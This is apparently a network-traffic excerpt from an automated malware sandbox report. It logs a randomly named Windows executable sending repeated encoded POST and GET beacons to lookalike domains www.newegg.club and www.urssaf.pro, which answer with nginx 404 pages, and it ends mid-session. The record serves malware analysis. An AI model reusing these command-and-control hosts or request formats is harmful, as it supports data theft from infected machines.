                                                                                                      Nov 18, 2024 13:54:19.559607983 CET146INData Raw: 62 2e 73 75 62 73 74 72 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 69 66 28 68 3d 3d 67 29 7b 66 3d 63 7d 76 61 72 20 65 3d 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 2b 31 3b 69 66 28 65 3d 3d 30 29 7b 65
                                                                                                      Data Ascii: b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=f
                                                                                                      Nov 18, 2024 13:54:19.567527056 CET1236INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 3b 5f 5f 63 6d 70 2e 61 3d 5f 5f 63 6d 70 2e 61 7c 7c 5b 5d 3b 69 66 28 21 61 2e 6c 65 6e 67 74 68 29 7b 72 65 74 75 72 6e 20 5f 5f 63 6d 70 2e 61 7d 65 6c 73 65 7b 69 66
                                                                                                      Data Ascii: unction(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:31},true)}else{
                                                                                                      Nov 18, 2024 13:54:19.567548990 CET1236INData Raw: 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 76 61 72 20 68 3d 66 61 6c 73 65 3b 5f 5f 67 70 70 2e 65 3d 5f 5f 67 70 70 2e 65 7c 7c 5b 5d 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 5f 5f 67 70 70 2e 65 2e 6c 65 6e 67 74 68
                                                                                                      Data Ascii: removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}return{eventName:"listenerRemoved",listenerId:e,data:h,pingData:window.cmp_gpp_ping()}}else{if(g=
                                                                                                      Nov 18, 2024 13:54:19.567565918 CET1236INData Raw: 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29
                                                                                                      Data Ascii: returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.parameter)}if(typeof(c)==="object"&&c!==null&&"__gppCall" in c){var b=c.__gppCall;window.__gpp(b.command,function(h,g){var e={__gppReturn:{returnValue
                                                                                                      Nov 18, 2024 13:54:19.567580938 CET1236INData Raw: 69 73 61 62 6c 65 67 70 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 67 70 70 4c 6f 63 61 74 6f 72 22 29
                                                                                                      Data Ascii: isablegpp" in window)||!window.cmp_disablegpp){window.cmp_addFrame("__gppLocator")}window.cmp_setStub("__cmp");if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){window.cmp_setStub("__tcfapi")}if(!("cmp_disableusp" in window)||!window.c


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.549987149.115.238.44801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:54:25.226416111 CET737OUTPOST /z6yq/ HTTP/1.1
                                                                                                      Host: www.newegg.club
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.newegg.club
                                                                                                      Referer: http://www.newegg.club/z6yq/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 46 4c 50 2b 63 36 32 73 47 47 37 43 69 72 47 63 42 37 6d 50 54 76 6a 52 6a 66 6d 54 4d 34 4b 37 64 6f 56 43 4f 32 2b 4d 77 6a 33 6c 76 35 48 39 59 63 5a 37 37 38 6a 6e 4a 43 37 64 41 6f 47 4b 54 2f 66 63 75 35 4c 6c 57 37 7a 63 45 6b 64 39 5a 2f 41 56 53 49 73 53 59 4e 6c 45 54 47 37 7a 76 47 51 36 47 6b 50 59 62 4c 73 34 51 65 63 55 68 41 6e 6c 59 58 39 31 48 58 2f 75 2f 42 70 6f 34 79 45 61 69 71 52 58 4e 77 4b 49 4c 67 37 62 75 66 7a 63 72 4d 76 49 76 72 56 7a 46 46 67 59 6a 6c 41 39 45 51 71 62 57 4d 41 4f 7a 58 57 6b 59 42 4c 73 77 6d 47 71 67 31 4f 59 64 34 66 63 71 74 48 62 66 79 55 3d
                                                                                                      Data Ascii: 3Vh=FLP+c62sGG7CirGcB7mPTvjRjfmTM4K7doVCO2+Mwj3lv5H9YcZ778jnJC7dAoGKT/fcu5LlW7zcEkd9Z/AVSIsSYNlETG7zvGQ6GkPYbLs4QecUhAnlYX91HX/u/Bpo4yEaiqRXNwKILg7bufzcrMvIvrVzFFgYjlA9EQqbWMAOzXWkYBLswmGqg1OYd4fcqtHbfyU=
                                                                                                      Nov 18, 2024 13:54:25.871208906 CET691INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Mon, 18 Nov 2024 12:54:25 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 548
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.549988149.115.238.44801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:54:27.766491890 CET757OUTPOST /z6yq/ HTTP/1.1
                                                                                                      Host: www.newegg.club
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.newegg.club
                                                                                                      Referer: http://www.newegg.club/z6yq/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 46 4c 50 2b 63 36 32 73 47 47 37 43 6b 4b 32 63 44 59 4f 50 43 50 6a 53 74 2f 6d 54 61 49 4b 33 64 6f 5a 43 4f 7a 61 6d 73 46 48 6c 75 59 33 39 5a 65 78 37 34 38 6a 6e 51 79 37 53 4e 49 47 2f 54 2f 54 75 75 34 6e 6c 57 37 6e 63 45 6c 74 39 5a 4d 6f 57 54 59 73 71 52 74 6c 4b 5a 6d 37 7a 76 47 51 36 47 6e 79 51 62 4c 6b 34 51 75 4d 55 67 69 50 69 53 33 39 79 58 48 2f 75 75 52 70 73 34 79 45 34 69 75 52 39 4e 79 79 49 4c 67 72 62 75 4e 58 64 6b 4d 76 47 79 62 55 2f 55 58 70 52 6b 46 4d 71 59 78 66 36 4f 74 4d 37 37 42 6e 4f 43 6a 44 45 6a 47 71 53 77 6d 47 76 4d 49 2b 31 77 4f 58 72 42 6c 42 55 39 42 68 51 4e 2f 4a 76 47 50 39 2f 65 78 39 65 41 75 52 70
                                                                                                      Data Ascii: 3Vh=FLP+c62sGG7CkK2cDYOPCPjSt/mTaIK3doZCOzamsFHluY39Zex748jnQy7SNIG/T/Tuu4nlW7ncElt9ZMoWTYsqRtlKZm7zvGQ6GnyQbLk4QuMUgiPiS39yXH/uuRps4yE4iuR9NyyILgrbuNXdkMvGybU/UXpRkFMqYxf6OtM77BnOCjDEjGqSwmGvMI+1wOXrBlBU9BhQN/JvGP9/ex9eAuRp
                                                                                                      Nov 18, 2024 13:54:28.407143116 CET691INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Mon, 18 Nov 2024 12:54:28 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 548
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.549989149.115.238.44801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:54:30.315171957 CET1774OUTPOST /z6yq/ HTTP/1.1
                                                                                                      Host: www.newegg.club
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1240
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.newegg.club
                                                                                                      Referer: http://www.newegg.club/z6yq/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 46 4c 50 2b 63 36 32 73 47 47 37 43 6b 4b 32 63 44 59 4f 50 43 50 6a 53 74 2f 6d 54 61 49 4b 33 64 6f 5a 43 4f 7a 61 6d 73 47 6e 6c 76 75 6a 39 59 34 35 37 35 38 6a 6e 50 43 37 47 4e 49 47 59 54 2f 4c 71 75 35 61 59 57 35 66 63 46 44 35 39 53 5a 55 57 5a 59 73 71 63 4e 6c 4c 54 47 37 71 76 47 41 2b 47 6b 4b 51 62 4c 6b 34 51 6f 49 55 70 51 6e 69 55 33 39 31 48 58 2f 55 2f 42 70 55 34 79 63 43 69 75 64 48 4e 42 36 49 4c 42 62 62 73 2b 7a 64 37 38 76 45 78 62 56 69 55 58 31 53 6b 46 51 51 59 78 62 63 4f 71 41 37 71 6c 79 46 52 48 66 77 77 68 61 49 2b 32 43 74 62 73 69 56 33 64 37 32 4d 79 39 61 77 41 6b 35 62 61 31 69 44 74 45 36 4c 47 42 74 4a 62 56 68 78 63 2b 4f 6e 58 45 37 79 59 58 4d 2b 41 4c 69 33 42 63 42 50 55 38 76 54 32 30 6f 43 69 54 71 58 55 4a 65 47 42 4e 6b 51 46 32 69 49 41 70 39 36 49 7a 65 38 67 7a 64 74 74 6a 54 35 6c 35 72 78 5a 66 59 34 78 4a 38 71 37 56 78 34 31 77 43 51 67 39 42 6c 77 42 4d 41 57 70 77 59 61 4d 53 6f 43 39 6a 30 38 30 45 38 73 43 4d 5a 30 62 65 34 43 [TRUNCATED]
                                                                                                      Data Ascii: 3Vh=FLP+c62sGG7CkK2cDYOPCPjSt/mTaIK3doZCOzamsGnlvuj9Y45758jnPC7GNIGYT/Lqu5aYW5fcFD59SZUWZYsqcNlLTG7qvGA+GkKQbLk4QoIUpQniU391HX/U/BpU4ycCiudHNB6ILBbbs+zd78vExbViUX1SkFQQYxbcOqA7qlyFRHfwwhaI+2CtbsiV3d72My9awAk5ba1iDtE6LGBtJbVhxc+OnXE7yYXM+ALi3BcBPU8vT20oCiTqXUJeGBNkQF2iIAp96Ize8gzdttjT5l5rxZfY4xJ8q7Vx41wCQg9BlwBMAWpwYaMSoC9j080E8sCMZ0be4CuiuivlwEV8RJMo26ggeGnRB/b+aci2A/bmlB8FblImNKmNhjPAzZU17+9AVPF4rQ40GARDtXSrnMRQiA/KcBSkk3vWvQVEMjDAVa1jFay2nkfVCN7A1x1uDfWuQOzhIz0/fWjQNv2SWaEdV1cq8zEsOr0zr/0oFRyThyFVHXD1Cdoor57XqF8nRT4rF59ZBnz5utP19a2bnqg8rVPeBlsEfofHiOK3ztHTRCe1V1yIwfeJJ09b62JpLPMHcboeMPu7Eot5A9ivjzO11ZDDrRthZ59lBNoXKAjs1xf7i1A9cBddhVRX0A1NB7s7VNEDMoREZBb/LUqkf6Ai2Zp7PFS9QcZXcjkNS8ZVjLArNgjVDfQp0JD5nQhVCDjORqlkkVn5NihWh5kXSzcwNZP7H3YCFZ1b1cQdLAC5URp6l2rrIQn7SjO1hlG0EDY2G/Zm41FP1kLI15BwJJqnwUbBIA6pB1Nt37v2dg8BKHeif+CLYO6iPMKafvJ4HO/ecZmo2hcsu2yXkgabICkv23fc8/hIGVcZVq8w64T7A0N26VE9mxgUnkvIXlG066UY4acup3qIDDYk//tR844oDLPiTLEbzkJaqg8Ab3+8lOah8AISZ5SSyVhcj3uh5y2CYe73Mx+TTJpghujUsiewcQ6iJfXCAHkOk7rzXoob [TRUNCATED]
                                                                                                      Nov 18, 2024 13:54:30.969628096 CET691INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Mon, 18 Nov 2024 12:54:30 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 548
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.549990149.115.238.44801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:54:32.859011889 CET484OUTGET /z6yq/?GLvL=i6ILStp&3Vh=IJnefPGbAG2krK+EKqL7a6PcsOn2aPK/WZ9HL1Dz7m/jpK3dV9N7lfXoIgTZBqqJT6Dwk+2xUIDeSWpocJA6c4hKTPFrc23hpH01F3StVZ8qYYY4ti7AYH4NQlXIhw0jjg== HTTP/1.1
                                                                                                      Host: www.newegg.club
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Nov 18, 2024 13:54:33.513044119 CET691INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Mon, 18 Nov 2024 12:54:33 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 548
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.54999175.2.103.23801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:54:38.748069048 CET734OUTPOST /z0cc/ HTTP/1.1
                                                                                                      Host: www.urssaf.pro
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.urssaf.pro
                                                                                                      Referer: http://www.urssaf.pro/z0cc/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 72 4e 61 49 35 33 32 42 38 46 67 36 34 4c 46 75 79 33 5a 6b 51 53 46 79 6d 73 78 36 52 4e 49 36 54 53 6a 4d 62 67 53 43 6a 76 35 7a 48 69 32 67 58 39 38 37 30 46 56 38 4c 47 6d 50 44 59 6f 79 55 4d 6f 56 30 50 51 6c 61 35 45 74 64 53 68 56 46 79 79 43 6f 7a 39 69 6c 4c 41 73 47 4d 4e 68 2f 66 2b 55 2f 70 75 4a 37 56 2f 4a 78 5a 37 32 43 73 36 71 6a 77 7a 5a 44 68 4c 75 51 54 6d 6a 4e 45 68 4f 4a 59 4f 42 48 59 43 4f 61 54 39 31 58 72 43 58 6c 4a 41 41 50 4a 4c 44 43 33 61 65 6f 6e 2f 65 6f 61 70 39 30 36 54 49 4e 61 43 75 32 67 39 4d 30 66 7a 69 4e 55 6f 2b 5a 6b 62 53 31 6a 4b 6e 6f 50 49 3d
                                                                                                      Data Ascii: 3Vh=rNaI532B8Fg64LFuy3ZkQSFymsx6RNI6TSjMbgSCjv5zHi2gX9870FV8LGmPDYoyUMoV0PQla5EtdShVFyyCoz9ilLAsGMNh/f+U/puJ7V/JxZ72Cs6qjwzZDhLuQTmjNEhOJYOBHYCOaT91XrCXlJAAPJLDC3aeon/eoap906TINaCu2g9M0fziNUo+ZkbS1jKnoPI=


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.54999275.2.103.23801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:54:41.299343109 CET754OUTPOST /z0cc/ HTTP/1.1
                                                                                                      Host: www.urssaf.pro
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.urssaf.pro
                                                                                                      Referer: http://www.urssaf.pro/z0cc/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 72 4e 61 49 35 33 32 42 38 46 67 36 34 6f 74 75 70 55 78 6b 45 43 46 7a 71 4d 78 36 62 74 49 32 54 53 76 4d 62 68 6d 53 69 5a 70 7a 48 44 47 67 55 38 38 37 35 6c 56 38 44 6d 6d 4b 65 49 6f 35 55 4d 6c 6d 30 4e 55 6c 61 35 34 74 64 54 52 56 47 42 61 4e 70 6a 39 38 74 72 41 75 4c 73 4e 68 2f 66 2b 55 2f 70 36 7a 37 52 72 4a 79 74 2f 32 43 4e 36 6c 2f 67 7a 61 43 68 4c 75 61 7a 6d 5a 4e 45 68 67 4a 61 32 37 48 65 4f 4f 61 51 70 31 4f 61 43 55 71 4a 41 61 42 70 4b 70 53 33 48 47 68 6e 7a 6c 6a 4a 6f 4b 6b 37 72 4f 4d 73 7a 45 73 43 31 6b 6e 2f 66 61 64 48 67 4a 49 55 36 37 76 41 61 58 32 59 66 46 41 4d 65 36 67 44 41 6f 46 30 49 4b 45 49 67 75 35 4e 2b 58
                                                                                                      Data Ascii: 3Vh=rNaI532B8Fg64otupUxkECFzqMx6btI2TSvMbhmSiZpzHDGgU8875lV8DmmKeIo5UMlm0NUla54tdTRVGBaNpj98trAuLsNh/f+U/p6z7RrJyt/2CN6l/gzaChLuazmZNEhgJa27HeOOaQp1OaCUqJAaBpKpS3HGhnzljJoKk7rOMszEsC1kn/fadHgJIU67vAaX2YfFAMe6gDAoF0IKEIgu5N+X


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      11192.168.2.54999375.2.103.23801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:54:43.854106903 CET1771OUTPOST /z0cc/ HTTP/1.1
                                                                                                      Host: www.urssaf.pro
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1240
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
